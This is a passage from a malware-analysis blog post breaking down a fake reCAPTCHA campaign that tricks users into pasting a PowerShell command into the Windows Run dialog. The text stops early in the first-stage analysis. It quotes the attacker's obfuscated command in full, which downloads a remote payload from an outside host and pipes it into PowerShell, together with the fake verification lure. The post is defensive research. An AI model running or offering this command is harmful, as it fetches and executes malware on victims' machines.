Breaking Down A Multi-Stage PowerShell Infection

aviab1.github.io · Avia Barazani · 11 months ago · research
quality 7/10 · good
0 net
Tags
powershell infection multi-stage
Breaking Down A Multi-Stage PowerShell Infection | AviaB's Blog Overview Overview 1st Stage Analysis Case‐altered obfuscation String splitting obfuscation 2nd Stage Analysis 3rd Stage Analysis Final Stage Analysis Summary Indicators Of Compromise (IOC) Breaking Down A Multi-Stage PowerShell Infection Avia Barazani May 11, 2025 10 min read svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90"> Malware Analysis svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90"> PowerShell svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-secondary text-secondary-foreground [a&]:hover:bg-secondary/90"> infection-chain Table of Contents Overview 1st Stage Analysis Case‐altered obfuscation String splitting obfuscation 2nd Stage Analysis 3rd Stage Analysis Final Stage Analysis Summary Indicators Of Compromise (IOC) Overview Fake reCAPTCHA campaigns are nothing new in the cyber threat landscape. Despite their simplicity, these campaigns are surprisingly effective at tricking users. The technique is straightforward: the victim is shown a fake reCAPTCHA page that instructs them to verify their identity by pasting a PowerShell command into the Windows Run dialog. This seemingly harmless action initiates the infection chain. This article will focus on deobfuscating and analyzing the infection chain step by step, all the way to the final payload. It will also break down and explain the various techniques used by the attacker. Here’s a high-level diagram of the infection chain: 1st Stage Analysis We can see the infamous fake reCAPTCHA page. Upon clicking “I’m not a robot,” a prompt pops up, providing us with clear instructions regarding the “verification” process. If we follow the instructions, we notice that something is copied to our clipboard. At first glance, this doesn’t appear alarming. However, when we paste the command into a text editor, we quickly realize it reveals something much different from what we initially expected. Terminal window PoWERSHElL - w M "in" i "m" ized c "Url.E" X "e" - k - L -- "re" try 9 "9" 9 ht "tps:/" / "dy" b "e" p.fu "n" / "fb8" 8 "c" 1eb2 "1" d "4" f "e2" 71 "2" 723729a "d2" f "e" 7 "38.tx" t | powe "r" shell - ; " 🌐 Access Guard: Validation. RefID: 45ab26cf05b6abc95f Before we delve into the specifics of what this command does and the techniques it employs, it’s crucial to first understand how this command made its way into our clipboard. Looking at the HTML source code, we can see the initialization of a new